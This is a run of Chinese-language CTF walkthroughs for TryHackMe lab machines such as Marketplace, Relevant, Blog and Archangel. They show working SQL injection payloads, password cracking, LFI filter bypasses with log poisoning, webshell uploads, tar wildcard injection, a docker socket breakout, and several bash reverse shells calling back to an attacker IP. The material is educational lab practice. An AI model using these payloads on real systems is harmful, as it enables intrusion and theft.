測了一陣子發現空白要用 /**/ 來繞"-1/**/UNION/**/SELECT/**/1,2,3,4/**/--")爆 db- p = "-1 UNION SELECT 1,group_concat(schema_name),3,4 FROM information_schema.schemata --"
兩個 DBinformation_schema
marketplace先關注這個爆 table- p = "-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables where table_schema='marketplace' --"
發現有三張 tableitems
messages
users爆 column- p = "-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns where table_schema='marketplace' --"
id,author,title,description,image,id,user_from,user_to,message_content,is_read,id,username,password,isAdministrator應該需要觀察的是 username 跟 password選帳號- p = "-1 UNION SELECT 1,group_concat(username),3,4 FROM marketplace.users --"
jake,meow,michael,system
選密碼- p = "-1 UNION SELECT 1,group_concat(password),3,4 FROM marketplace.users --"
看起來有過 hash
把他大致整理一下$2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW, $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG $2b$10$FStzuEGFk9JpOnigl2gbEuE2rRp27psGUS0UuztTtxbZPFW/Wtn4m
查詢發現是 bcrypthttps://bcrypt-generator.com/
而且可以測試其中一個是我自己註冊的 meow
爆密碼- john password_hash.txt --wordlist=/opt/rockyou.txt
hashcat -m 3200 password_hash.txt rockyou.txt
中研院超級電腦的兩張 V100 吃滿要跑 3 小時，不太合理繼續 SQLi- p = "-1 UNION SELECT 1,group_concat(message_content),3,4 FROM marketplace.messages --"
噴出以下內容User Hello! An automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password. Your new password is: @b_ENXkGYUCAv3zJ,<script>alert(1)</script>,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your repor
看到一段看起來很像密碼的東西@b_ENXkGYUCAv3zJ

SSH

我們有 3 個 userjake
michael
system雖然可以徒手戳一下就好，但我今天想用 Hydra- hydra -L user.txt -P password.txt ssh://10.10.74.8
噴出的結果是 jakejake : @b_ENXkGYUCAv3zJSSH 登入成功-
取得 user keyTHM{c3648ee7af1369676e3e4b15da6dc0b4}

提權

起手式先 sudo -l 一波
看起來是很老梗的 sudo 備份ㄇ如果是的話我們只要戳個 Reverse shellecho "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /opt/backups/backup.sh就可以打完收工ㄌ但前題是我們需要有權限修改這個 sh- 看樣子不行QQ，我們不是賣口 QQ準備 Linpeas- wget 10.13.21.55:8000/linpeas.sh
發現 sudo version 1.8.21p2https://www.exploit-db.com/exploits/47502
但看起來不好用發現一包 backup 檔案-
用 nc 傳出來nc -l 1234 > backup.tar
cat backup.tar > /dev/tcp/10.13.21.55/1234
發現裡面都空ㄉㄍ騙我
回想起 backup.sh 他後面接了一個 *- 這個時候可以套用 tar-wildcard-injectionref : https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection
簡單來說 tar 會把後面的 * 的東西直接串起來當指令執行echo a > '--checkpoint=1'``echo a > '--checkpoint-action=exec=sh script.sh'echo whoami > script.sh用賣口權限執行- sudo -u michael /opt/backups/backup.sh
發現可以成功!!!
切換到賣口- echo bash > script.sh

二次提權

再一次 Linpeas發現 /var/run/docker.sock 可以寫入-
直接給我們 Exploit 教學ㄌ，好棒https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket觀察目前有使用的 docker image- 修改一下 image 的名字，使用 hacktricks 上面的 exploit 教學- docker -H unix:///var/run/docker.sock run -v /:/host -it nginx chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host nginx nsenter -t 1 -m -u -n -i sh創建 privileged 康天呢提權成功-

Source (Try Hack Me Writeup)

Mon, 16 Aug 2021 13:21:00 +0800

URL : https://tryhackme.com/room/source
IP : 10.10.63.154

Scan

掃 Portrustscan -a 10.10.63.154 -r 1-65535
22
10000nmap -A -p22,10000 10.10.63.154-
發現 10000 是 MiniServ 1.890直接連上去- http://10.10.63.154:10000/
發現它有綁 SSL 要用指定網址才能進10.10.63.154 ip-10-10-63-154.eu-west-1.compute.internal
綁上 /etc/hosts再次訪問-

Exploit

透過版本可以查詢到 MiniServ 1.890 Exploithttps://github.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/blob/master/webmin-1.890_exploit.py
wget https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py
python3 webmin-1.890_exploit.py
ㄟ就直接拿到 root 了ㄟ
太無聊ㄌㄅ = =懶得戳 Reverse shell ㄌ- 直接用這個類似 Webshell 的東西早點打完收工ㄅ
Root FlagTHM{UPDATE_YOUR_INSTALL}取 User Flag- 先看 home 使用者名稱看使用者資料夾- 取得 Flag-

Anonymous (Try Hack Me Writeup)

Wed, 11 Aug 2021 23:46:00 +0800

URL : https://tryhackme.com/room/anonymous

IP : 10.10.142.45

Recon

掃 Port 起手式rustscan -a 10.10.142.45 -r 1-65535 --ulimit 500022
21
139
445nmap -A -p21,22,139,445 10.10.142.45- 21 : FTPVSFTPD 2.0.822 : SSH139: SMB445: SMB嘗試連接 ftp- ftp 10.10.142.45 使用 anonymous 登入
發現裡面有一個 scripts 資料夾先把裡面所有檔案都載下來
觀察檔案- clean.sh看起來是一段清除資料的 bash script
removed_files.log- 看起來東西都是空的，是上述腳本的輸出
to_do.txt- 看起來沒有很重要
嘗試連線 SMB- 發現有一個 pics 資料夾裡面有兩張圖片- 把兩張圖片載下來- 觀察圖片- 看起來是狗勾!用 Exif tool 觀察-
可以看出 Photoshop 編輯過後來還用了 steghide 等程式，都沒有結果

嘗試 Exploit

尋找到 Vsftpd 2.3.4 有 Exploithttps://www.exploit-db.com/exploits/49757
wget https://www.exploit-db.com/download/49757 -O 49757.py
發現他是 Anonymous only，所以這個 Exploit 不能用!!
用了 msf 也是一樣的結果 QQ突然想到，說不定 ftp 上面的 clean.sh 是一個 cron job- 我們既然有讀寫的權限，可以在上面戳個 reverse shell 再傳上去
echo bash -c "'bash -i >& /dev/tcp /10.13.21.55/7877 0>&1'" >> clean.sh
本地端開 nc 來接成功接上ㄌ-
取得 User flag

提權

起手式 sudo -l看起來沒東西 QQ
準備 Linenum- wget 10.13.21.55:8000/LinEnum.sh
掃到了 /usr/bin/env 有 suid
透過 GTFOBins 尋找 env SUID 提權- /usr/bin/env /bin/sh -p成功提權-
取得 Root Flag

心得

FTP 上面的檔案也有可能是 Cron Job，看到 shell 就優先懷疑它是 cron ，看看能不能戳一些東西上去。打 Exploit 前須要先確定一下他有沒有一些限制(FTP的不能是 Anonymous登入)。

Relevant (Try Hack Me Writeup)

Tue, 10 Aug 2021 13:13:00 +0800

URL : https://tryhackme.com/room/relevant

IP : 10.10.115.198

Recon

rustscan -a 10.10.115.198發現有開80
135
139
445
3389nmap -A 10.10.115.198

Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-09 01:58 EDT
Nmap scan report for 10.10.115.198
Host is up (0.28s latency).
Not shown: 995 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: RELEVANT
| NetBIOS_Domain_Name: RELEVANT
| NetBIOS_Computer_Name: RELEVANT
| DNS_Domain_Name: Relevant
| DNS_Computer_Name: Relevant
| Product_Version: 10.0.14393
|_ System_Time: 2021-08-09T06:00:45+00:00
| ssl-cert: Subject: commonName=Relevant
| Not valid before: 2021-08-08T05:57:43
|_Not valid after: 2022-02-07T05:57:43
|_ssl-date: 2021-08-09T06:01:24+00:00; 0s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: Relevant
| NetBIOS computer name: RELEVANT\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2021-08-08T23:00:47-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-08-09T06:00:49
|_ start_date: 2021-08-09T05:58:06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 153.72 seconds

發現應該是 Winodws Server 2016 的機器

觀察網頁

去看 80 Port
是一個 IIS 的 Default Page掃目錄- python3 dirsearch.py -u http://10.10.115.198/
看起來沒什麼結果

觀察 SMB

smbclient --no-pass -L //10.10.115.198/可以觀察到有一個 nt4wrksv 目錄
smbclient -N //10.10.115.198/nt4wrksv- 就連上ㄌ
get passwords.txt觀察 passwords.txt 檔案-
會發現是編碼過後的東西，後面有 == 所以很明顯是 Base64Qm9iIC0gIVBAJCRXMHJEITEyMw==
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk解 Base64- 可以用 base64 -d 嘗試把帳密用 RDP 連線- xfreerdp +drives /u:Bob /v:10.10.115.198`
xfreerdp +drives /u:Bill /v:10.10.115.198
但也都失敗ㄌQQ嘗試連線 SMB-
但也都失敗了

搜尋更多的 Port

rustscan -a 10.10.115.198 --accessible -r 1-65535
發現真的有藏東西!!49669
49663
49667這邊我同時用 nmap 跑了一次，不過真的有夠慢QQ- nmap -p- 10.10.115.198
nmap -A -p49669,49663,49667 10.10.115.198-
發現 49663 是一個 IIS webserver掃目錄- python3 dirsearch.py -u http://10.10.115.198:49663/
掃到 aspnet_client
搜尋發現 aspnet_client/system_web 裡面常常會搭配一些特定字串https://itdrafts.blogspot.com/2013/02/aspnetclient-folder-enumeration-and.html?view=flipcard所以可以再依據字串掃一次-
還真的掃到了 4_0_30319

通靈掃描QQ

不知道為什麼機器死掉ㄌ，重新開的 IP 是 10.10.63.244
我們如果隨便訪問一個不存在的目錄，會回應404curl -I http://10.10.63.244:49663/12334/
通靈覺得，說不定 webroot 有剛才 smb 的資料夾?- curl -I curl -I http://10.10.63.244:49663/nt4wrksv/
200! 還真的有!!那我們是不是能取得剛剛 passwords.txt 的檔案- http://10.10.63.244:49663/nt4wrksv/passwords.txt
度ㄉ!!真的可以!!!!!

準備 Exploit

那我們應該可以用匿名登入的 smb 來上傳東西囉!準備一隻喵喵smbclient -N //10.10.63.244/nt4wrksv- 嘗試用瀏覽器訪問!-
成功!!!既然他是 IIS ，又是 ASPX，那我們應該可以傳個 aspx 的 webshell?- 網路上隨便找了一ㄍhttps://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/asp/cmd.aspx
丟上去
可以ㄟ!!!-
好讚ㄛ可以看系統的資訊ㄌ- 亂逛系統- 輸入指令 “cd ……\Users\Bob\Desktop && dir”![](https://i.imgur.com/hZrXxtO.png)取得 user flag- "cd ..\..\..\Users\Bob\Desktop && type user.txt"

戳 Reverse shell

雖然 Webshell 已經滿好用的了，但Reverse shell 用起來還是比較爽，我們來嘗試使用 Reverse shell
下面提供了滿多我嘗試的方法，但大多數都失敗ㄌ，僅有最後一個成功，不過我把失敗的方法也都列出來

Lazy Admin Final (Try Hack Me Writeup)

Tue, 10 Aug 2021 13:00:00 +0800

URL : https://tryhackme.com/room/lazyadmin

IP : 10.10.40.99

Scan

根據套路，先掃 Portnmap -A 10.10.40.99
發現有開 80 跟 22觀察網頁- 80 port 是一個 Apaphe 在 Ubuntu 上的 Default page
掃路徑- python3 dirsearch.py -u http://10.10.40.99
掃到一個 /content
http://10.10.40.99/content/上面寫說他是 SweetRice CMS
根據 /content 繼續掃會找到- 裡面有一個 Change Log
http://10.10.40.99/content/changelog.txt
裡面有寫到他的版本是 1.5尋找 Exploit- 找到了適用的 Exploit，不過需要使用者帳號跟密碼
https://www.exploit-db.com/exploits/40716繼續掃路徑- 找到一個 mysql_backuphttp://10.10.40.99/content/inc/mysql_backup/
裡面有一個備份的 SQL 檔案
內部有一些看起來是 PHP 序列話的東西5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";
看的出來admin : manager
passwd : 42f749ade7f9e195bf475f37a44cafcb透過 Google 尋找- Sweet Rice CMS 的後台是 /as
http://10.10.40.99/content/as/嘗試登入- 帳號 : manager
密碼 : 42f749ade7f9e195bf475f37a44cafcb登入失敗
正常人也不太可能用這種東西作為密碼
拿去 Google 後發現是 MD5可以透過這個網站解碼 https://md5.gromweb.com/?md5=42f749ade7f9e195bf475f37a44cafcb
所以答案是 Password123登入成功

Exploit

下載檔案wget https://www.exploit-db.com/download/40716 -O 40716.py``python3 40716.py 執行並輸入需要的資料- 10.10.40.99/content
manager
Password123
webshell.php5這邊我嘗試了 webshell.php 但是失敗
根據Exploit提示的改用 webshell.php5 就可以ㄌ
使用 Webshell- 可以成功連上改接 Reverse shell- http://10.10.40.99/content/attachment/webshell.php5?A=wget%2010.13.21.55:8000/s%20-O%20/tmp/s
本地端執行 nc -nlvp 7877
網址shell bash /tmp/s
就順利接上ㄌ取得 Flag-

準備提權

家目錄看到一組帳號密碼，先存下來
rice:randompass透過 sudo -l 發現我們可以用 sudo 執行這一段 Perl-
而這一段 perl 會用 sh 呼叫 /etc/copy.sh觀察 ls -al /etc/copy.sh- 可以發現我們有 Write 的權限
先把 /etc/copy.sh 備份一下以免搞壞- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
寫入我們的 Reverse shell- echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" > /etc/copy.sh監聽 Reverse shell- nc -nvlp 7878執行 Reverse shell- sudo /usr/bin/perl /home/itguy/backup.pl取得 Root- 取得 Root Flag

Blog (Try Hack Me Writeup)

Sun, 08 Aug 2021 23:53:00 +0800

URL : https://tryhackme.com/room/blog

IP : 10.10.175.75

Recon

老梗先用 rustscan 掃一下rustscan -a 10.10.175.75
可以看出開的 port 有22
80
139
445接下來用 nmap 做進一步的掃瞄- nmap -A -p22,80,139,445 10.10.175.75
可以看出http-generator: WordPress 5.0What version of the above CMS was being used?- 5.0What CMS was Billy using?- WordPress

Web

在文章內容中，可以看到有兩個作者Billy Joel帳號 :bjoelKaren Wheeler- 帳號 : kwheel
Joel 的媽媽發現網頁會自動跳轉到 blog.thm- 這是 Wordpress 的一個問題，第一次進入就會在 DB 寫死 Domain name 並自動跳轉
我們可以透過修改 /etc/hosts 把 IP 綁上 domainsudo vim /etc/hosts
裡面加上一行 10.10.175.75 blog.thm用 dirsearch 掃一次看看- python3 dirsearch.py -u http://blog.thm/
沒有什麼特別的結果，就是 Wordpress 該有的東西而已使用 WPScan，一款針對 Wordpress 的掃描器- 可以掃描出該網站有使用哪一些套件等
wpscan --update
wpscan --url http://blog.thm

└─$ wpscan --url http://blog.thm
_______________________________________________________________
 __ _______ _____
 \ \ / / __ \ / ____|
 \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
 \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
 \ /\ / | | ____) | (__| (_| | | | |
 \/ \/ |_| |_____/ \___|\__,_|_| |_|

 WordPress Security Scanner by the WPScan Team
 Version 3.8.17
 Sponsored by Automattic - https://automattic.com/
 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blog.thm/ [10.10.175.75]
[+] Started: Sat Aug 7 01:16:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://blog.thm/robots.txt
 | Interesting Entries:
 | - /wp-admin/
 | - /wp-admin/admin-ajax.php
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://blog.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 | - http://codex.wordpress.org/XML-RPC_Pingback_API
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 | - https://www.iplocation.net/defend-wordpress-from-ddos
 | - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.0 identified (Insecure, released on 2018-12-06).
 | Found By: Rss Generator (Passive Detection)
 | - http://blog.thm/feed/, https://wordpress.org/?v=5.0
 | - http://blog.thm/comments/feed/, https://wordpress.org/?v=5.0

[+] WordPress theme in use: twentytwenty
 | Location: http://blog.thm/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://blog.thm/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 | Confirmed By: Css Style In 404 Page (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 | - http://blog.thm/wp-content/themes/twentytwenty/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:16 (137 / 137) 100.00% Time: 00:00:16

[i] No Config Backups Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Aug 7 01:17:25 2021
[+] Requests Done: 170
[+] Cached Requests: 7
[+] Data Sent: 40.812 KB
[+] Data Received: 322.273 KB
[+] Memory used: 213.184 MB
[+] Elapsed time: 00:00:51

可以發現 wp-content/oploads 目錄沒有鎖前面有發現 Wordpress 的版本是 5.0- 上 searchsploit 尋找看看有沒有可以用的 Exploit
wget https://www.exploit-db.com/download/49512 -O 49512.py
然而執行起來發現需要帳號密碼，所以就暫時先放一邊

SMB

前面 nmap 發現他有開 SMB 的 port來掃看看 smbmap -H blog.thm
可以發現有開一個Disk 叫做BillySMB也可以用 smbclient -L //blog.thm 列出裡面的資訊- 由於 SMB 可以使用匿名登入，所以詢問密碼只要直接按下 Enter即可
如上截圖，發現會出現一個 SMB1 Disable 的錯誤- 依照下列網址方式處理https://dalemazza.wordpress.com/2020/04/20/nt_status_io_timeout-smb-error-and-how-to-fix-it/修改 /etc/samba/smb.conf-
在 [global] 裡面增加一行client min protocol = NT1就可以正常使用ㄌ輸入 smbclient -N '//blog/thm/BillySMB'- 可以直接進入 SMB 的 CLI輸入 ls 觀察裡面的資料- 輸入 get {檔名} 依序把檔案拔出來- 發現裡面有一張 QR Code- 網路上找一個 QR 轉換器然而只是一個普通的 Youtube 連結其他也都只是滿無聊的圖檔，沒有什麼特別

爆破密碼

爆破密碼很無聊，但有時候很有用針對 Wordpress 可以用 wpscan 內建的爆破方法我們先準備一個 user.txt 裡面有兩行，分別是兩個使用者bjoel
kwheel``wpscan --url http://blog.thm/ -U user.txt -P /opt/rockyou.txt- 接下來使用 -U 配使用者名稱檔案
-P 配密碼字典檔來未看先猜一下，爆出來比較有機會的是 kwheel- 因為是開發者的媽媽，老人家資安意識比較差
~~抱歉我就歧視~~等了十幾分鐘，真的成功的爆出了密碼!!- kwheel / cutiepie1
果然老人家愛用弱密碼接下來到 /wp-admin 準備登入-
也就真的順利登入了!!不過我們的使用者是 editor沒有權限可以修改 template 之類的方法取得 RCE

嘗試 exploit-db 的 Payload (失敗)

先講結論，失敗了，我也不知道為什麼 QQ我已經完全照著網路上的方法做
但是還是怪怪ㄉ QQ使用先前載好的 https://www.exploit-db.com/download/49512依照提示準備一個 gd.jpg- cp Alice-White-Rabbit.jpg gd.jpg
這邊我直接使用 smb 偷出來的圖片用 exiftool 寫入 shell- exiftool gd.jpg -CopyrightNotice=""
在這邊我們可以用 strings 觀察，檔案真的被寫進去了修改原始碼的 lhost 與 lport-
python3 49512.py http://blog.thm/ kwheel cutiepie1 twentytwenty
nc -nvlp 7877
然而，都失敗了QQQ

使用大絕招 msf !!

輸入 msfconsole``use exploit/multi/http/wp_crop_rce
show options觀察需要的參數set PASSWORD cutiepie1``set USERNAME kwheel``set RHOSTS blog.thm``set LHOST 10.13.21.55``exploit- 就成功接上了 meterpreter 的 shell- 但這邊我還是想使用普通的 reverse shell
所以我們就輸入 shell 切換進入再來我想接回 reverse shell- 在攻擊機輸入 nc -nvlp 7877
meterpreter 輸入bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'
就可以順利接回 shell然而在使用者的家目錄看到的 user.txt 是假的 QQ沒關係，我現在懶得找，等有 root 後再說ㄅ觀察使用者家目錄有一個 pdf 檔案，抓出來研究看看- 攻擊機 nc -l -p 1234 > Billy_Joel_Termination_May20-2020.pdf
靶機 `nc 10.13.21.55 1234

準備提權

使用常常出現的工具 linpeaswget 10.13.21.55:8000/linpeas.sh
bash linpeas.sh
我們可以找到 wordpress 的資料庫密碼
LittleYellowLamp90!@發現 sudo 版本是 1.8.21- 發現一個奇怪的檔案有 suid- 檔案路徑是 /usr/sbin/checker
觀察 Checker- 先把檔案傳出來攻擊機 nc -l -p 1234 > checker
靶機 nc 10.13.21.55 1234 使用 r2分析-r2 checker`
aaa
s main
VV
可以發現他會把 admin 傳入 getenv
然後如果有值就會給我們一個 shell回到攻擊機，給予一個 admin 的環境變數- admin=meow /usr/sbin/checker
就拿到 root shell 了
取得 root flag-
9a0b2b618bef9bfa7ac28c1353d9f318等等 … 阿user flag ㄋ- 好懶得翻ㄛ…我們就暴力搜ㄅ
find / -iname user.txt -print 2>/dev/null可以找到 user flag 藏在 /media/usb/user.txt-
c8421899aae571f7af486492b71a8ab7

Bolt (Try Hack Me Writeup)

Fri, 06 Aug 2021 23:56:00 +0800

URL : https://tryhackme.com/room/bolt

IP : 10.10.51.13

Recon

rustscan -a 10.10.51.13
發現有開22
80
8000nmap -A -p22,80,8000 10.10.51.13- 觀察網頁- 808080- What port number has a web server with a CMS running?- 8000What is the username we can find in the CMS?-
boltWhat is the password we can find for the username?-
boltadmin123``python3 dirsearch.py -u http://10.10.51.13:8000/ -e all- http://10.10.51.13:8000/.htaccess裡面沒什麼特別網路上找到後臺網址- http://10.10.51.13:8000/bolt/login
What version of the CMS is installed on the server? (Ex: Name 1.1.1)- Bolt 3.7.1
上一張截圖最下面有寫Google Bolt 3.7.1 Exploit- https://www.exploit-db.com/exploits/48296
wget https://www.exploit-db.com/download/48296 -O 48296.pyThere’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?- 48296
不知道為什麼，我 run 起來失敗QQ網路上找到另外一組 exploit- https://medium.com/@foxsin34/bolt-cms-3-7-1-authenticated-rce-remote-code-execution-ed781e03237b
他莫名的把我的密碼改成 password 了
但是也沒有用 ?__?改用 msf- search bolt找到了第 0 個 RCE 的use 0``set PASSWORD password``set USERNAME bolt``set RHOSTS 10.10.51.13``set LHOST tun0``show optionsexploit-
成功 RCE 取得 flag-
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

Archangel (Try Hack Me Writeup)

Fri, 06 Aug 2021 23:48:00 +0800

url : https://tryhackme.com/room/archangel

IP : 10.10.163.60

Recon

起手式，掃 Port rustscan -a 10.10.163.60
80 , 22掃路徑 python3 dirsearch.py -u http://10.10.163.60/ -e all- 觀察網頁首頁，發現裡面有 /flag-
點進去後 ……
幹…
用 curl 觀察
他會自動跳轉到這邊 https://www.youtube.com/watch?v=dQw4w9WgXcQ

Dfferent Hostname

題目提示 : Find a different hostname
可以觀察 mafialive.thm``sudo vim /etc/hosts- 加上這一行 10.10.163.60 mafialive.thm
接下來到 http://mafialive.thm/
就拿到了 flag再掃一次路徑python3 dirsearch.py -u http://mafialive.thm/ -e all- http://mafialive.thm/robots.txt
/test.phphttp://mafialive.thm/test.php
觀察按下按鈕後的網址- http://mafialive.thm/test.php?view=/var/www/html/development_testing/mrrobot.php
感覺很明顯可以 LFI嘗試 Base64 Payloadhttp://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php
成功 !!
觀察 test.php 原始碼http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php

INCLUDE
 Test Page. Not to be Deployed

 Here is a button

又撿到一個 flag thm{explo1t1ng_lf1}觀察原始碼發現，網址裡不能出現 ../.. 且一定要出現 /var/www/html/development_testing``../.. 可以用 .././.. 繞測試 curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././etc/passwd成功!!來看 apache access log- /var/log/apache2/access.log
curl http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log
成功 !!
往上拉發現所有的 host log 都在這邊，所以可以直接針對 ip 來做 nc 寫 phpnc 10.10.163.60 80
GET /?
再回去看一次 access log- http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log
成功出現 phpinfo !!
寫入 webshell- nc 10.10.163.60 80
GET /
http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&A=ls![](/uploads/2022/02/ea69f-JHfk4lv.png)下載 reverse shell- http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=wget 10.13.21.55:8000/s -O /tmp/s
本地準備監聽 nc -vlk 7877
執行 shell http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././.././.././.././.././.././var/log/apache2/access.log&B=bash%20/tmp/s
成功接上
使用 python 讓 terminal 變漂亮- python3 -c 'import pty; pty.spawn("/bin/bash")'找 user flag-
thm{lf1_t0_rc3_1s_tr1cky}找到使用者資料夾內有 passwordbackup-
幹…再一次
等……等等，不會吧
該不會那個網址真 TM 是他的密碼 ?__?
好的，好險不是使用 Linpeas 掃- wget 10.13.21.55:8000/linpeas.sh
bash linpeas.sh找到一個可疑的 cron job發現這個 cron 會使用 archangel 來執行，而且我們對 /opt/helloworld.sh有讀寫權限寫入 reverse shellecho "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7878 0>&1'" >> /opt/helloworld.sh等待一分鐘後，自動接上!!-
找到 flagthm{h0r1zont4l_pr1v1l3g3_2sc4ll4t10n_us1ng_cr0n}觀察使用者中的 secret 資料夾中- 有一個 backup 檔案有 suid透過 nc 把檔案傳出來- 監聽端 nc -l -p 1234 > meow
發送端 nc 10.13.21.55 1234 哼!這種等級的 reverse，連 ida 都不用開，我們用 r2 就好ㄌ- r2 meow`
aaa
s main
VV
可以看到他會用 system call 一個 cp
而 cp 沒有寫絕對路徑，所以可以用 path 進行誤導

誤導 path

在家目錄創一個 fakepathmkdir fakepath
export PATH=/home/archangel/fakepath:$PATH準備一個假的 cp 檔案- echo '#!/bin/bash' > cp
echo "/bin/bash" >> cp
chmod +x cp執行 backup- ./backup取得 root 權限 !!- thm{p4th_v4r1abl3_expl01tat1ion_f0r_v3rt1c4l_pr1v1l3g3_3sc4ll4t10n}

Alfred (Try Hack Me Writeup)

Fri, 06 Aug 2021 23:45:00 +0800

URL : https://tryhackme.com/room/alfred

IP : 10.10.244.238

Initial access

rustscan -a 10.10.244.238
80
3389
8080nmap -A -p80,3389,8080 10.10.244.238-
發現 8080 的 Jenkins 是Jetty 9.4.z-SNAPSHOT
但找不到相關的 Exploit80 port 首頁-
看起來沒什麼特別的東西QQ
python3 dirsearch.py -u http://10.10.244.238/掃了之後也沒啥東西8080 port 登入頁面-
發現會掃出一些404，但沒啥幫助

進入 Jenkins

看到官方的 hint 寫 *****:*****直接通靈猜 admin:admin
就進去了 ……
好無聊= =透過 Deploy 的 build code 輸入指令- whoami
systeminfo
準備 Windows Reverse Shell- 本機wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
